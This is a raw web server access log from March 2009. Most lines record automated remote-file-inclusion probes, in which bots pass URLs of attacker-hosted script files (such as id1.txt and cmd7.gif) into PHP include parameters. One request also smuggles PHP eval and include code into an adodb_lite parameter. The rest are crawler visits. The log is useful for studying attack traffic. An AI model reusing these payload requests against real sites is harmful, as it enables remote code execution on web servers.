61.110.18.100 - - [22/Mar/2009:13:25:49 -0500] "GET /logs/access_log.1231286400//skin/zero_vote/ask_password.php?dir=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 342 "-""Mozilla/5.0"
70.84.20.132 - - [22/Mar/2009:13:26:32 -0500] "GET //include/lib.inc.php?site_path=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.65"
70.84.20.132 - - [22/Mar/2009:13:26:32 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
77.221.130.6 - - [22/Mar/2009:13:36:46 -0500] "GET /logs/access_log.1235260800//_test_main.php?php?APB_rp=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
77.221.130.6 - - [22/Mar/2009:13:36:46 -0500] "GET /logs//_test_main.php?php?APB_rp=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
77.221.130.6 - - [22/Mar/2009:13:36:48 -0500] "GET //_test_main.php?php?APB_rp=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
77.221.130.6 - - [22/Mar/2009:13:36:48 -0500] "GET /logs/access_log.1230595200//_test_main.php?php?APB_rp=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.78.88.237 - - [22/Mar/2009:13:39:44 -0500] "GET /logs//_test_main.php?php?APB_rp=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.78.88.237 - - [22/Mar/2009:13:39:44 -0500] "GET //_test_main.php?php?APB_rp=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.78.88.237 - - [22/Mar/2009:13:39:44 -0500] "GET /logs/access_log.1235260800//_test_main.php?php?APB_rp=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.78.88.237 - - [22/Mar/2009:13:39:44 -0500] "GET /logs/access_log.1230595200//_test_main.php?php?APB_rp=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
70.84.20.132 - - [22/Mar/2009:13:45:29 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
70.84.20.132 - - [22/Mar/2009:13:45:29 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
61.110.18.100 - - [22/Mar/2009:13:50:29 -0500] "GET //skin/zero_pic_gallery/ask_password.php?dir=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:13:50:29 -0500] "GET /logs//skin/zero_pic_gallery/ask_password.php?dir=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:13:50:29 -0500] "GET /logs/access_log.1231286400//skin/zero_pic_gallery/ask_password.php?dir=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:13:50:30 -0500] "GET //skin/zero_pic_gallery/ask_password.php?dir=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:13:50:30 -0500] "GET /logs//skin/zero_pic_gallery/ask_password.php?dir=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:13:50:30 -0500] "GET /logs/access_log.1231286400//skin/zero_pic_gallery/ask_password.php?dir=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
66.232.145.150 - - [22/Mar/2009:13:50:54 -0500] "GET /logs//skin/zero_pic_gallery/ask_password.php?dir=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
66.232.145.150 - - [22/Mar/2009:13:50:54 -0500] "GET //skin/zero_pic_gallery/ask_password.php?dir=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
66.232.145.150 - - [22/Mar/2009:13:50:54 -0500] "GET /logs/access_log.1231286400//skin/zero_pic_gallery/ask_password.php?dir=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:13:51:07 -0500] "GET /logs/access_log.1231804800//skin/zero_pic_gallery/ask_password.php?dir=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:13:51:10 -0500] "GET /logs/access_log.1231804800//skin/zero_pic_gallery/ask_password.php?dir=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
122.201.76.100 - - [22/Mar/2009:13:51:44 -0500] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
122.201.76.100 - - [22/Mar/2009:13:51:44 -0500] "GET /logs/access_log.1235347200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
122.201.76.100 - - [22/Mar/2009:13:51:44 -0500] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
83.64.132.254 - - [22/Mar/2009:13:51:46 -0500] "GET /logs//skin/zero_pic_gallery/ask_password.php?dir=http://www.goddog.co.kr/zeroboard/data/bbs/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
83.64.132.254 - - [22/Mar/2009:13:51:46 -0500] "GET /logs/access_log.1231286400//skin/zero_pic_gallery/ask_password.php?dir=http://www.goddog.co.kr/zeroboard/data/bbs/readme.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
122.201.76.100 - - [22/Mar/2009:13:51:49 -0500] "GET /logs/access_log.1235779200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
69.57.170.33 - - [22/Mar/2009:13:51:52 -0500] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://help4dogs.ru/den/idoisir.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.814"
66.232.145.150 - - [22/Mar/2009:13:51:53 -0500] "GET /logs/access_log.1231804800//skin/zero_pic_gallery/ask_password.php?dir=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
69.57.170.33 - - [22/Mar/2009:13:51:54 -0500] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://help4dogs.ru/den/idoisir.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.814"
61.110.18.100 - - [22/Mar/2009:13:53:02 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:13:53:02 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 315 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:13:53:02 -0500] "GET /logs/access_log.1233705600/includes/ktedit/toolbar.php?dirDepth=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 337 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:13:53:03 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:13:53:03 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 315 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:13:53:03 -0500] "GET /logs/access_log.1233705600/includes/ktedit/toolbar.php?dirDepth=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 337 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:13:53:20 -0500] "GET /logs/access_log.1235001600/includes/ktedit/toolbar.php?dirDepth=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 337 "-""Mozilla/5.0"
61.110.18.100 - - [22/Mar/2009:13:53:20 -0500] "GET /logs/access_log.1235001600/includes/ktedit/toolbar.php?dirDepth=http://kbapt.co.kr/bbs/templates/id1.txt????? HTTP/1.1" 404 337 "-""Mozilla/5.0"
119.63.193.56 - - [22/Mar/2009:13:55:58 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
161.53.60.3 - - [22/Mar/2009:14:06:33 -0500] "GET /?INCLUDE_FOLDER=http://okto.co.kr//zboard/include/v6.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
161.53.60.3 - - [22/Mar/2009:14:06:35 -0500] "GET /logs/?INCLUDE_FOLDER=http://okto.co.kr//zboard/include/v6.txt??? HTTP/1.1" 200 182572 "-""libwww-perl/5.803"
12.53.219.68 - - [22/Mar/2009:14:09:20 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lennex.com/rs/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
12.53.219.68 - - [22/Mar/2009:14:09:20 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lennex.com/rs/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
12.53.219.68 - - [22/Mar/2009:14:09:20 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lennex.com/rs/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
161.53.60.3 - - [22/Mar/2009:14:09:45 -0500] "GET /logs/access_log.1235952000/?INCLUDE_FOLDER=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
161.53.60.3 - - [22/Mar/2009:14:09:45 -0500] "GET /?INCLUDE_FOLDER=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
161.53.60.3 - - [22/Mar/2009:14:09:48 -0500] "GET /logs/?INCLUDE_FOLDER=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 200 182572 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
12.53.219.68 - - [22/Mar/2009:14:11:14 -0500] "GET /logs/access_log.1235692800//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lennex.com/rs/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
77.221.130.6 - - [22/Mar/2009:14:11:20 -0500] "GET /logs/access_log.1232755200/administrator/components/com_mambots/toolbar.mambots.html.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
77.221.130.6 - - [22/Mar/2009:14:11:20 -0500] "GET /administrator/components/com_mambots/toolbar.mambots.html.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
77.221.130.6 - - [22/Mar/2009:14:11:20 -0500] "GET /logs/administrator/components/com_mambots/toolbar.mambots.html.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
216.246.99.99 - - [22/Mar/2009:14:12:37 -0500] "GET /logs//skin/zero_pic_gallery/ask_password.php?dir=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.246.99.99 - - [22/Mar/2009:14:12:37 -0500] "GET /logs/access_log.1231286400//skin/zero_pic_gallery/ask_password.php?dir=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
216.246.99.99 - - [22/Mar/2009:14:12:37 -0500] "GET //skin/zero_pic_gallery/ask_password.php?dir=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.221.130.6 - - [22/Mar/2009:14:13:34 -0500] "GET /logs/access_log.1233619200/administrator/components/com_mambots/toolbar.mambots.html.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
118.129.166.142 - - [22/Mar/2009:14:14:41 -0500] "GET /logs/access_log.1235692800/?DOCUMENT_ROOT=http://www.xgamex.org/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
118.129.166.142 - - [22/Mar/2009:14:14:44 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.xgamex.org/fx29id.txt?? HTTP/1.1" 200 182572 "-""Mozilla/5.0"
118.129.166.142 - - [22/Mar/2009:14:14:44 -0500] "GET /?DOCUMENT_ROOT=http://www.xgamex.org/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
161.53.60.3 - - [22/Mar/2009:14:19:01 -0500] "GET /logs/access_log.1235692800/?INCLUDE_FOLDER=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
212.187.255.241 - - [22/Mar/2009:14:38:28 -0500] "POST /xmlrpc.php HTTP/1.1" 404 293 "-""libwww-perl/5.65"
77.221.130.6 - - [22/Mar/2009:14:46:32 -0500] "GET /logs/index2.php?option=com_mambots&client=client&task=editA&hidemainmenu=1&id=&mosConfig_absolute_path=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.6 - - [22/Mar/2009:14:46:33 -0500] "GET /index2.php?option=com_mambots&client=client&task=editA&hidemainmenu=1&id=&mosConfig_absolute_path=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.230.21.133 - - [22/Mar/2009:14:56:14 -0500] "GET /logs/images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
87.230.21.133 - - [22/Mar/2009:14:56:14 -0500] "GET /images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
80.68.61.100 - - [22/Mar/2009:14:59:49 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
80.68.61.100 - - [22/Mar/2009:14:59:51 -0500] "GET //components/com_flyspray/startdown.php?file=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:15:04:18 -0500] "GET /logs//testheaderpage.php?rootSys=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:15:04:18 -0500] "GET //testheaderpage.php?rootSys=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
62.193.225.191 - - [22/Mar/2009:15:04:28 -0500] "GET /logs//testheaderpage.php?rootSys=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:15:04:28 -0500] "GET //testheaderpage.php?rootSys=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:15:04:29 -0500] "GET /logs//testheaderpage.php?rootSys=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:15:04:29 -0500] "GET //testheaderpage.php?rootSys=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
78.111.71.6 - - [22/Mar/2009:15:04:31 -0500] "GET /logs//testheaderpage.php?rootSys=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
78.111.71.6 - - [22/Mar/2009:15:04:32 -0500] "GET //testheaderpage.php?rootSys=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
87.230.21.133 - - [22/Mar/2009:15:05:26 -0500] "GET /logs/images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
87.230.21.133 - - [22/Mar/2009:15:05:26 -0500] "GET /images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
62.193.225.191 - - [22/Mar/2009:15:05:45 -0500] "GET /logs//testheaderpage.php?rootSys=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:15:05:45 -0500] "GET //testheaderpage.php?rootSys=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
89.111.184.103 - - [22/Mar/2009:15:07:36 -0500] "GET /logs//errors.php?error=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.111.184.103 - - [22/Mar/2009:15:07:36 -0500] "GET //errors.php?error=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
70.84.20.132 - - [22/Mar/2009:15:10:06 -0500] "GET /logs//testheaderpage.php?rootSys=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
70.84.20.132 - - [22/Mar/2009:15:10:06 -0500] "GET //testheaderpage.php?rootSys=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
216.193.201.72 - - [22/Mar/2009:15:15:31 -0500] "GET /logs//administrator/includes/com_mambots/toolbar.mambots.html.php?mosConfig_absolute_path=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.76"
216.193.201.72 - - [22/Mar/2009:15:15:31 -0500] "GET //administrator/includes/com_mambots/toolbar.mambots.html.php?mosConfig_absolute_path=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.76"
80.68.61.100 - - [22/Mar/2009:15:37:11 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
80.68.61.100 - - [22/Mar/2009:15:37:13 -0500] "GET //modules/xfsection/modify.php?dir_module=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
218.27.203.107 - - [22/Mar/2009:15:45:39 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:15:45:39 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:15:45:39 -0500] "GET /logs/access_log.1236038400/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:15:45:58 -0500] "GET /logs/access_log.1235779200/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:15:47:02 -0500] "GET /logs/access_log.1236124800/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:15:47:03 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:15:47:03 -0500] "GET /logs/access_log.1236038400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:15:47:04 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:15:47:25 -0500] "GET /logs/access_log.1235779200/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:15:48:01 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:15:48:01 -0500] "GET /logs/access_log.1236038400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:15:48:01 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:15:48:06 -0500] "GET /logs/access_log.1235779200/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
216.246.99.99 - - [22/Mar/2009:15:49:06 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.jungga.co.kr/zboard//skin/zero_vote/images/idfell.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
216.246.99.99 - - [22/Mar/2009:15:49:06 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.jungga.co.kr/zboard//skin/zero_vote/images/idfell.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
74.124.198.146 - - [22/Mar/2009:15:55:40 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.classicjoke.com/mambots/cmd7.gif?%0D? HTTP/1.1" 404 343 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
74.124.198.146 - - [22/Mar/2009:15:55:40 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.classicjoke.com/mambots/cmd7.gif?%0D? HTTP/1.1" 404 348 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
208.76.222.178 - - [22/Mar/2009:16:01:30 -0500] "GET /logs/access_log.1235952000/e404.php?DOCUMENT_ROOT=http://www.annuaire-philatelie.com/les_news/backend/idfx1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
208.76.222.178 - - [22/Mar/2009:16:01:38 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.annuaire-philatelie.com/les_news/backend/idfx1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
208.76.222.178 - - [22/Mar/2009:16:01:41 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.annuaire-philatelie.com/les_news/backend/idfx1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
65.55.208.133 - - [22/Mar/2009:16:05:28 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [22/Mar/2009:16:05:28 -0500] "GET /logs/access_log.1153872000 HTTP/1.1" 200 325 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
69.27.110.65 - - [22/Mar/2009:16:06:23 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://envolverde.ig.com.br/parceiros/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
69.27.110.65 - - [22/Mar/2009:16:06:23 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://envolverde.ig.com.br/parceiros/id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
80.68.61.100 - - [22/Mar/2009:16:06:46 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
80.68.61.100 - - [22/Mar/2009:16:06:48 -0500] "GET //Neos_Chronos/header.php?base_folder=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
65.55.208.133 - - [22/Mar/2009:16:06:59 -0500] "GET /logs/access_log.1198800000 HTTP/1.1" 200 1051 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [22/Mar/2009:16:06:59 -0500] "GET /logs/access_log.1185494400 HTTP/1.1" 200 4011 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [22/Mar/2009:16:06:59 -0500] "GET /logs/access_log.1176422400 HTTP/1.1" 200 915 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [22/Mar/2009:16:06:59 -0500] "GET /logs/access_log.1185926400 HTTP/1.1" 200 2986 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [22/Mar/2009:16:07:00 -0500] "GET /logs/access_log.1215302400 HTTP/1.1" 200 327 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [22/Mar/2009:16:07:00 -0500] "GET /logs/access_log.1182816000 HTTP/1.1" 200 21789 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [22/Mar/2009:16:07:01 -0500] "GET /logs/access_log.1171411200 HTTP/1.1" 200 6477 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [22/Mar/2009:16:07:02 -0500] "GET /logs/access_log.1158796800 HTTP/1.1" 200 1142 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [22/Mar/2009:16:07:03 -0500] "GET /logs/access_log.1143590400 HTTP/1.1" 200 816 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [22/Mar/2009:16:07:04 -0500] "GET /logs/access_log.1119052800 HTTP/1.1" 200 331 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [22/Mar/2009:16:07:04 -0500] "GET /logs/access_log.1203811200 HTTP/1.1" 200 13135 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [22/Mar/2009:16:07:05 -0500] "GET /logs/access_log.1183766400 HTTP/1.1" 200 1377 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [22/Mar/2009:16:07:05 -0500] "GET /logs/access_log.1184198400 HTTP/1.1" 200 2231 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [22/Mar/2009:16:07:06 -0500] "GET /logs/access_log.1131753600 HTTP/1.1" 200 801 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
